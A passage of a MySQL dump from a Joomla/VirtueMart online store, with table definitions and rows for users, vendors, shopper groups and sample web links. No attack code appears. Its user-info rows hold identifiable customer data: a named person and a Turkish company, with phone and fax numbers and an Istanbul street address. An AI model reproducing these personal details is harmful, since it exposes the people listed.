11:31:08',676,'2017-11-05 11:31:08',676,'0000-00-00 00:00:00',0),(23,0,0,'delimiter_sendregistration','COM_VIRTUEMART_BUTTON_SEND_REG','','delimiter',25,30,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,'',2,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(24,0,0,'delimiter_userinfo','COM_VIRTUEMART_ORDER_PRINT_CUST_INFO_LBL','','delimiter',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,1,0,1,0,0,0,0,'',14,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(25,1,0,'tax_exemption_number','COM_VIRTUEMART_SHOPPER_FORM_TAXEXEMPTION_NBR','Vendors can set here a tax exemption number for a shopper. This field is only changeable by administrators.','text',10,0,0,0,0,NULL,NULL,NULL,0,0,1,0,1,0,0,'',48,0,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(26,1,0,'tax_usage_type','COM_VIRTUEMART_SHOPPER_FORM_TAX_USAGE','Federal, national, educational, public, or similar often get a special tax. This field is only writable by administrators.','select',0,0,0,0,0,NULL,NULL,NULL,0,0,1,0,1,0,0,'',50,0,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_userfields` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_userinfos`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_userinfos`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_userinfos` (
  `virtuemart_userinfo_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_user_id` int unsigned NOT NULL DEFAULT '0',
  `address_type` char(2) NOT NULL DEFAULT '',
  `address_type_name` char(32) NOT NULL DEFAULT '',
  `name` char(64) DEFAULT NULL,
  `company` varchar(255) DEFAULT NULL,
  `title` char(32) DEFAULT NULL,
  `last_name` char(48) DEFAULT NULL,
  `first_name` char(48) DEFAULT NULL,
  `middle_name` char(48) DEFAULT NULL,
  `phone_1` char(32) DEFAULT NULL,
  `phone_2` char(32) DEFAULT NULL,
  `fax` varchar(255) DEFAULT NULL,
  `address_1` char(64) NOT NULL DEFAULT '',
  `address_2` char(64) DEFAULT NULL,
  `city` char(64) NOT NULL DEFAULT '',
  `virtuemart_state_id` smallint unsigned NOT NULL DEFAULT '0',
  `virtuemart_country_id` smallint unsigned NOT NULL DEFAULT '0',
  `zip` char(32) NOT NULL DEFAULT '',
  `agreed` tinyint(1) NOT NULL DEFAULT '0',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_userinfo_id`),
  KEY `address_type` (`address_type`),
  KEY `i_virtuemart_user_id` (`virtuemart_userinfo_id`,`virtuemart_user_id`),
  KEY `virtuemart_user_id` (`virtuemart_user_id`,`address_type`),
  KEY `address_type_name` (`address_type_name`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb3 COMMENT='Customer Information, BT = BillTo and ST = ShipTo';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_userinfos`
--

LOCK TABLES `fz6t4_virtuemart_userinfos` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_userinfos` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_userinfos` VALUES (1,676,'BT','','Super User','3S Elektronik ve Otomasyon Teknolojileri Ltd. Şti.','','Teknolojileri','3S Elektronik ve Otomasyon','','902124828456','','902124828424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010','','Istanbul',0,215,'034010',0,'2014-08-01 09:38:53',676,'2014-08-01 09:41:09',676,'0000-00-00 00:00:00',0),(2,677,'BT','','Ahmet Unlu','DMB Elektronik A.S.','Mr','Enunlu','Ahmet','','0212 482 8606','','0212 482 8424','Davutpaşa Caddesi, Serçekale Sokak 10/1, Topkapi 34010','','Zeytinburnu',0,215,'034010',0,'2014-08-07 06:43:22',677,'2014-08-07 06:43:22',677,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_userinfos` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_vendor_medias`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_vendor_medias`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_vendor_medias` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_media_id` int unsigned NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`,`virtuemart_media_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_vendor_medias`
--

LOCK TABLES `fz6t4_virtuemart_vendor_medias` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_vendor_medias` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_vendor_medias` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_vendor_users`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_vendor_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_vendor_users` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_user_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_user_id` int unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `virtuemart_vendor_user_id` (`virtuemart_vendor_user_id`,`virtuemart_user_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_vendor_users`
--

LOCK TABLES `fz6t4_virtuemart_vendor_users` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_vendor_users` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_vendor_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_vendors`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_vendors`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_vendors` (
  `virtuemart_vendor_id` int unsigned NOT NULL AUTO_INCREMENT,
  `vendor_name` varchar(64) DEFAULT NULL,
  `vendor_currency` int DEFAULT NULL,
  `vendor_accepted_currencies` varchar(1536) NOT NULL DEFAULT '',
  `vendor_params` varchar(14335) NOT NULL DEFAULT '',
  `metarobot` varchar(20) DEFAULT NULL,
  `metaauthor` varchar(64) DEFAULT NULL,
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_vendor_id`),
  KEY `vendor_name` (`vendor_name`),
  KEY `vendor_currency` (`vendor_currency`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb3 COMMENT='Vendors manage their products in your store';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_vendors`
--

LOCK TABLES `fz6t4_virtuemart_vendors` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_vendors` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_vendors` VALUES (1,'3S Technologies',144,'47,139,144','vendor_min_pov=\"0\"|vendor_min_poq=1|vendor_freeshipment=0|vendor_address_format=\"\"|vendor_date_format=\"\"|vendor_letter_format=\"A4\"|vendor_letter_orientation=\"P\"|vendor_letter_margin_top=\"45\"|vendor_letter_margin_left=\"25\"|vendor_letter_margin_right=\"25\"|vendor_letter_margin_bottom=\"25\"|vendor_letter_margin_header=\"12\"|vendor_letter_margin_footer=\"20\"|vendor_letter_font=\"helvetica\"|vendor_letter_font_size=\"8\"|vendor_letter_header_font_size=\"7\"|vendor_letter_footer_font_size=\"6\"|vendor_letter_header=\"1\"|vendor_letter_header_line=\"1\"|vendor_letter_header_line_color=\"#000000\"|vendor_letter_header_image=\"1\"|vendor_letter_header_imagesize=\"60\"|vendor_letter_header_cell_height_ratio=\"1\"|vendor_letter_footer=\"1\"|vendor_letter_footer_line=\"1\"|vendor_letter_footer_line_color=\"#000000\"|vendor_letter_footer_cell_height_ratio=\"1\"|vendor_letter_add_tos=\"0\"|vendor_letter_add_tos_newpage=\"1\"|','','','0000-00-00 00:00:00',0,'2014-08-01 09:41:09',676,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_vendors` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_vendors_en_gb`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_vendors_en_gb`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_vendors_en_gb` (
  `virtuemart_vendor_id` int unsigned NOT NULL,
  `vendor_store_desc` text NOT NULL,
  `vendor_terms_of_service` mediumtext NOT NULL,
  `vendor_legal_info` text NOT NULL,
  `vendor_letter_css` text NOT NULL,
  `vendor_letter_header_html` varchar(8000) NOT NULL DEFAULT '<h1>{vm:vendorname}</h1><p>{vm:vendoraddress}</p>',
  `vendor_letter_footer_html` varchar(8000) NOT NULL DEFAULT '<p>{vm:vendorlegalinfo}<br />Page {vm:pagenum}/{vm:pagecount}</p>',
  `vendor_store_name` varchar(180) NOT NULL DEFAULT '',
  `vendor_phone` varchar(26) NOT NULL DEFAULT '',
  `vendor_url` varchar(255) NOT NULL DEFAULT '',
  `metadesc` varchar(400) NOT NULL DEFAULT '',
  `metakey` varchar(400) NOT NULL DEFAULT '',
  `customtitle` varchar(255) NOT NULL DEFAULT '',
  `vendor_invoice_free1` varchar(255) NOT NULL DEFAULT '',
  `vendor_invoice_free2` varchar(255) NOT NULL DEFAULT '',
  `vendor_mail_free1` varchar(255) NOT NULL DEFAULT '',
  `vendor_mail_free2` varchar(255) NOT NULL DEFAULT '',
  `vendor_mail_css` varchar(255) NOT NULL DEFAULT '',
  `slug` varchar(192) NOT NULL DEFAULT '',
  PRIMARY KEY (`virtuemart_vendor_id`),
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_vendors_en_gb`
--

LOCK TABLES `fz6t4_virtuemart_vendors_en_gb` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_vendors_en_gb` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_vendors_en_gb` VALUES (1,'','','','','','','3S Technologies','','','','','','','','','','','3s-technologies');
/*!40000 ALTER TABLE `fz6t4_virtuemart_vendors_en_gb` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_vendors_tr_tr`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_vendors_tr_tr`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_vendors_tr_tr` (
  `virtuemart_vendor_id` int unsigned NOT NULL,
  `vendor_store_desc` text NOT NULL,
  `vendor_terms_of_service` mediumtext NOT NULL,
  `vendor_legal_info` text NOT NULL,
  `vendor_letter_css` text NOT NULL,
  `vendor_letter_header_html` varchar(8000) NOT NULL DEFAULT '<h1>{vm:vendorname}</h1><p>{vm:vendoraddress}</p>',
  `vendor_letter_footer_html` varchar(8000) NOT NULL DEFAULT '<p>{vm:vendorlegalinfo}<br />Page {vm:pagenum}/{vm:pagecount}</p>',
  `vendor_store_name` varchar(180) NOT NULL DEFAULT '',
  `vendor_phone` varchar(26) NOT NULL DEFAULT '',
  `vendor_url` varchar(255) NOT NULL DEFAULT '',
  `metadesc` varchar(400) NOT NULL DEFAULT '',
  `metakey` varchar(400) NOT NULL DEFAULT '',
  `customtitle` varchar(255) NOT NULL DEFAULT '',
  `vendor_invoice_free1` varchar(255) NOT NULL DEFAULT '',
  `vendor_invoice_free2` varchar(255) NOT NULL DEFAULT '',
  `vendor_mail_free1` varchar(255) NOT NULL DEFAULT '',
  `vendor_mail_free2` varchar(255) NOT NULL DEFAULT '',
  `vendor_mail_css` varchar(255) NOT NULL DEFAULT '',
  `slug` varchar(192) NOT NULL DEFAULT '',
  PRIMARY KEY (`virtuemart_vendor_id`),
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_vendors_tr_tr`
--

LOCK TABLES `fz6t4_virtuemart_vendors_tr_tr` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_vendors_tr_tr` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_vendors_tr_tr` VALUES (1,'','','','','','','3S Technologies','','','','','','','','','','','3s-technologies');
/*!40000 ALTER TABLE `fz6t4_virtuemart_vendors_tr_tr` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_vmuser_shoppergroups`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_vmuser_shoppergroups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_vmuser_shoppergroups` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_user_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_shoppergroup_id` int unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `virtuemart_user_id` (`virtuemart_user_id`,`virtuemart_shoppergroup_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='xref table for users to shopper group';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_vmuser_shoppergroups`
--

LOCK TABLES `fz6t4_virtuemart_vmuser_shoppergroups` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_vmuser_shoppergroups` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_vmuser_shoppergroups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_vmusers`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_vmusers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_vmusers` (
  `virtuemart_user_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` int unsigned NOT NULL DEFAULT '0',
  `user_is_vendor` tinyint(1) NOT NULL DEFAULT '0',
  `customer_number` varchar(32) DEFAULT NULL,
  `virtuemart_paymentmethod_id` int unsigned DEFAULT NULL,
  `virtuemart_shipmentmethod_id` int unsigned DEFAULT NULL,
  `perms` char(40) NOT NULL DEFAULT 'shopper',
  `agreed` tinyint(1) NOT NULL DEFAULT '0',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_user_id`),
  UNIQUE KEY `u_virtuemart_user_id` (`virtuemart_user_id`,`virtuemart_vendor_id`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `user_is_vendor` (`user_is_vendor`)
) ENGINE=InnoDB AUTO_INCREMENT=678 DEFAULT CHARSET=utf8mb3 COMMENT='Holds the unique user data';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_vmusers`
--

LOCK TABLES `fz6t4_virtuemart_vmusers` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_vmusers` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_vmusers` VALUES (676,1,1,'AD21232f297',0,0,'admin',0,'2014-08-01 09:38:53',676,'2014-08-01 09:41:09',676,'0000-00-00 00:00:00',0),(677,0,0,'DMefa0e2f9c',0,0,'shopper',0,'0000-00-00 00:00:00',0,'2014-08-07 06:43:22',677,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_vmusers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_waitingusers`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_waitingusers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_waitingusers` (
  `virtuemart_waitinguser_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_product_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_user_id` int unsigned NOT NULL DEFAULT '0',
  `notify_email` varchar(150) NOT NULL DEFAULT '',
  `notified` tinyint(1) NOT NULL DEFAULT '0',
  `notify_date` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `ordering` int NOT NULL DEFAULT '0',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_waitinguser_id`),
  KEY `virtuemart_product_id` (`virtuemart_product_id`),
  KEY `notify_email` (`notify_email`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Stores notifications, users waiting f. products out of stock';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_waitingusers`
--

LOCK TABLES `fz6t4_virtuemart_waitingusers` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_waitingusers` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_waitingusers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_worldzones`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_worldzones`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_worldzones` (
  `virtuemart_worldzone_id` smallint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` int unsigned DEFAULT NULL,
  `zone_name` varchar(255) DEFAULT NULL,
  `zone_cost` decimal(10,2) DEFAULT NULL,
  `zone_limit` decimal(10,2) DEFAULT NULL,
  `zone_description` varchar(14335) DEFAULT NULL,
  `zone_tax_rate` int unsigned NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  `shared` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_worldzone_id`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='The Zones managed by the Zone Shipment Module';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_worldzones`
--

LOCK TABLES `fz6t4_virtuemart_worldzones` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_worldzones` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_worldzones` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_weblinks`
--

DROP TABLE IF EXISTS `fz6t4_weblinks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_weblinks` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `catid` int NOT NULL DEFAULT '0',
  `sid` int NOT NULL DEFAULT '0',
  `title` varchar(250) NOT NULL DEFAULT '',
  `alias` varchar(255) CHARACTER SET utf8mb3 COLLATE utf8mb3_bin NOT NULL DEFAULT '',
  `url` varchar(250) NOT NULL DEFAULT '',
  `description` text NOT NULL,
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `hits` int NOT NULL DEFAULT '0',
  `state` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int NOT NULL DEFAULT '0',
  `archived` tinyint(1) NOT NULL DEFAULT '0',
  `approved` tinyint(1) NOT NULL DEFAULT '1',
  `access` int NOT NULL DEFAULT '1',
  `params` text NOT NULL,
  `language` char(7) NOT NULL DEFAULT '',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int unsigned NOT NULL DEFAULT '0',
  `metakey` text NOT NULL,
  `metadesc` text NOT NULL,
  `metadata` text NOT NULL,
  `featured` tinyint unsigned NOT NULL DEFAULT '0' COMMENT 'Set if link is featured.',
  `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`state`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`),
  KEY `idx_featured_catid` (`featured`,`catid`),
  KEY `idx_language` (`language`),
  KEY `idx_xreference` (`xreference`)
) ENGINE=MyISAM AUTO_INCREMENT=10 DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_weblinks`
--

LOCK TABLES `fz6t4_weblinks` WRITE;
/*!40000 ALTER TABLE `fz6t4_weblinks` DISABLE KEYS */;
INSERT INTO `fz6t4_weblinks` VALUES (1,32,0,'Joomla!','joomla','http://www.joomla.org','<p>Home of Joomla!</p>','0000-00-00 00:00:00',3,1,0,'0000-00-00 00:00:00',1,0,1,1,'{\"target\":\"0\",\"count_clicks\":\"\"}','en-GB','2011-01-01 00:00:01',676,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00'),(2,33,0,'php.net','php','http://www.php.net','<p>The language that Joomla! is developed in</p>','0000-00-00 00:00:00',6,1,0,'0000-00-00 00:00:00',1,0,1,1,'{\"target\":\"\",\"count_clicks\":\"\"}','en-GB','2011-01-01 00:00:01',676,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00'),(3,33,0,'MySQL','mysql','http://www.mysql.com','<p>The most commonly used database for Joomla!.</p>','0000-00-00 00:00:00',1,1,0,'0000-00-00 00:00:00',2,0,1,1,'{\"target\":\"\",\"width\":\"\",\"height\":\"\",\"count_clicks\":\"\"}','en-GB','2011-01-01 00:00:01',676,'','2012-01-17 16:19:43',42,'','','{\"robots\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00'),(4,32,0,'OpenSourceMatters','opensourcematters','http://www.opensourcematters.org','<p>Home of OSM</p>','0000-00-00 00:00:00',11,1,0,'0000-00-00 00:00:00',3,0,1,1,'{\"target\":\"0\",\"count_clicks\":\"\"}','en-GB','2011-01-01 00:00:01',676,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00'),(5,32,0,'Joomla! - Forums','joomla-forums','http://forum.joomla.org','<p>Joomla! Forums</p>','0000-00-00 00:00:00',4,1,0,'0000-00-00 00:00:00',2,0,1,1,'{\"target\":\"0\",\"count_clicks\":\"\"}','en-GB','2011-01-01 00:00:01',676,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00'),(6,33,0,'Ohloh Tracking of Joomla!','ohloh-tracking-of-joomla','http://www.ohloh.net/projects/20','<p>Objective reports from Ohloh about Joomla\'s development activity. Joomla! has some star developers with serious kudos.</p>','0000-00-00 00:00:00',1,1,0,'0000-00-00 00:00:00',3,0,1,1,'{\"target\":\"0\",\"count_clicks\":\"\"}','en-GB','2011-01-01 00:00:01',676,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00'),(7,31,0,'Baw Baw National Park','baw-baw-national-park','http://www.parkweb.vic.gov.au/1park_display.cfm?park=44','<p>Park of the Austalian Alps National Parks system, Baw Baw  features sub alpine vegetation, beautiful views, and opportunities for hiking, skiing and other outdoor activities.</p>','0000-00-00 00:00:00',0,1,0,'0000-00-00 00:00:00',1,0,1,1,'{\"target\":\"0\",\"count_clicks\":\"\"}','en-GB','2011-01-01 00:00:01',676,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00'),(8,31,0,'Kakadu','kakadu','http://www.environment.gov.au/parks/kakadu/index.html','<p>Kakadu is known for both its cultural heritage and its natural features. It is one of a small number of places listed as World Heritage Places for both reasons. Extensive rock art is found there.</p>','0000-00-00 00:00:00',0,1,0,'0000-00-00 00:00:00',2,0,1,1,'{\"target\":\"0\",\"count_clicks\":\"\"}','en-GB','2011-01-01 00:00:01',676,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00'),(9,31,0,'Pulu Keeling','pulu-keeling','http://www.environment.gov.au/parks/cocos/index.html','<p>Located on an atoll 2000 kilometers north of Perth, Pulu Keeling is Australia\'s smallest national park.</p>','0000-00-00 00:00:00',0,1,0,'0000-00-00 00:00:00',3,0,1,1,'{\"target\":\"0\",\"count_clicks\":\"\"}','en-GB','2011-01-01 00:00:01',676,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}',0,'','2010-07-10 23:44:03','0000-00-00 00:00:00');
/*!40000 ALTER TABLE `fz6t4_weblinks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_wf_profiles`
--

DROP TABLE IF EXISTS `fz6t4_wf_profiles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_wf_profiles` (
  `id` int NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `description` text NOT NULL,
  `users` text NOT NULL,
  `types` text NOT NULL,
  `components` text NOT NULL,
  `area` tinyint NOT NULL,
  `device` varchar(255) NOT NULL,
  `rows` text NOT NULL,
  `plugins` text NOT NULL,
  `published` tinyint NOT NULL,
  `ordering` int NOT NULL,
  `checked_out` tinyint NOT NULL,
  `checked_out_time` datetime NOT NULL,
  `params` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_wf_profiles`
--

LOCK TABLES `fz6t4_wf_profiles` WRITE;
/*!40000 ALTER TABLE `fz6t4_wf_profiles` DISABLE KEYS */;
